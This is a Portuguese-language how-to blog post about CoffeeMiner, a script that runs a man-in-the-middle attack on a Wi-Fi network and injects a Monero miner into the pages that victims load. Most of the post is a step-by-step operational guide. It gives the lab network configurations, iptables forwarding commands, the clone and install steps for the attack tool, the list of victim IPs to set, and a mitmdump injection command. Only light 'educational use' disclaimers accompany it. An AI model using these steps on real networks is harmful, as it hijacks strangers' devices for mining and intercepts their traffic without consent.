Image default
How To

CoffeeMiner: Hackeando redes wi-fi para minerar criptomoedas

Em dezembro de 2017 foi noticiado que uma unidade do Starbucks da Agentina estava minerando bitcoin utilizando os dispositivos móveis (smartphone, notebooks, etc) dos usuários que se conectavam no wi-fi grátis fornecido pela empresa, no momento em que acessavam o site do Starbucks argentino.

Seguindo este mesmo cenário, um programador chamado Arnau Code, criou o CoffeeMiner, um script em Python que realiza um ataque Man-in-the-middle(em conjunto com outras ferramentas) para injetar javascript em páginas html, forçando todos os dispositivos conectados à rede wi-fi a minerarem criptomoedas para o atacante.

Vai um aviso do criador:

ESTE PROJETO É SOMENTE PARA FINS EDUCACIONAIS

Conceito

  • Realiza um ataque man-the-middle (homem no meio) em todas as vítimas selecionadas;
  • Injeta um script js em todas as páginas HTML requisitadas pela vítima;
  • O script injetado contém um minerador de criptomoedas (Coinhive);
  • A criptomoeda utilizada é o Monero;
  • Todos os dispositivos conectados à rede e que forem de possíveis vítimas, estarão minerando para o CoffeeMiner.

1 – Cenário

Teremos algumas máquinas conectadas à rede wi-fi, e o CoffeMiner do atacante interceptará o tráfego entre os usuários e o router.

CoffeeMiner: Hackeando redes wi-fi para minerar criptomoedas
CoffeeMiner: Hackeando redes wi-fi para minerar criptomoedas | Fonte imagem: http://arnaucode.com/blog/coffeeminer-hacking-wifi-cryptocurrency-miner.html

2 – Configuração do cenário

O cenário real é com uma rede wi-fi com notebooks e smartphones conectados. O criador testou do CoffeeMiner testou no mundo real e fiz que funciona. Mas para este post, veremos como configurar em um ambiente virtual.

Utilizaremos o VirtualBox para configurar o nosso cenário. Acesse este endereço para fazer o download.

Antes de tudo, é necessário fazer o download da imagem de algum Linux e instalá-la no VirtualBox. Para este exemplo, utilizaremos o Kali Linux (https://www.kali.org/).

2.1 – Instruções

Após terminado o download, prepararemos 3 máquinas virtual no VirtualBox, seguindo a regra:

Vítima

Será a máquina da vítima, que possui conectividade com o router e que navega em algumas paginas.

Atacante

Será a máquina que roda o CoffeeMiner, e também a que realizará o ataque MITM.

Router/Gateway

Será um gateway normal.

CoffeeMiner: Hackeando redes wi-fi para minerar criptomoedas
CoffeeMiner: Hackeando redes wi-fi para minerar criptomoedas | Fonte imagem: http://arnaucode.com/blog/coffeeminer-hacking-wifi-cryptocurrency-miner.html

Para configurar cada uma das máquinas, utilizaremos a seguinte configuração:

VÍTIMA

Adaptador de rede:

eth0: Host-only

/etc/network/interfaces:

auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static
address 10.0.2.10
netmask 255.255.255.0
gateway 10.0.2.15

ATACANTE

Adaptador de rede:

eth0: Host-only

/etc/network/interfaces:

auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static
address 10.0.2.20
netmask 255.255.255.0
gateway 10.0.2.15

Router/Gateway:

Adaptador de rede:

eth0: Bridged

eth1: Host-only

/etc/network/interfaces:

auto lo
iface lo inet loopback
auto eth0
iface eth0 inet dhcp
auto eth1
address 10.0.2.15
netmask 255.255.255.0

GATEWAY

Adaptador de rede

Bridged Adapter
Host-only Adapter

/etc/network/interfaces:

auto lo
iface lo inet loopback

auto eth0
iface eth0 inet dhcp

auto eth1
iface eth1 inet static
address 10.0.2.15
netmask 255.255.255.0

Limpar regras do IPTABLES

iptables –flush

iptables –table nat –flush

Configurar o router como um gateway

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT
iptables -A FORWARD -i eth1 -o eth0 -j ACCEPT

Clonar o repositório do CoffeeMiner

git clone https://github.com/arnaucode/coffeeMiner.git

3 – Instalar o CoffeeMiner

Siga os seguintes passos para instalar o CoffeeMiner

  • cd  coffeeminer
  • bash install.sh
  • Editar o arquivo victims.txt referente o IP das vítima e inserir um IP por linha.
  • Editar o arquivo coffeeMiner.py, linha 28, e inserir o IP do atacante:

os.system(“~/.local/bin/mitmdump -s ‘injector.py http://10.0.2.20:8000/script.js’ -T”)

  • Execute o CoffeeMiner.py com o comando

python3 coffeeMiner.py ipgateway

Demonstração do CoffeeMiner no VirtualBox

É sempre bom avisar amiguinho(a), utilize o conteúdo deste post somente para fins educacionais, ok?

Maiores informações:

http://arnaucode.com/blog/coffeeminer-hacking-wifi-cryptocurrency-miner.html

https://github.com/arnaucode/coffeeMiner

https://n0where.net/wireless-mitm-cryptocurrency-mining-pool-coffeeminer

Posts similares

DICA: Acessando servidores SSH sem o uso de senha

O Analista

Instale e configure o Linux Malware Detect e ClamAV no Linux

O Analista

Monte sistemas de arquivos remotos sobre SSH com o SSHFS

O Analista
O Analista_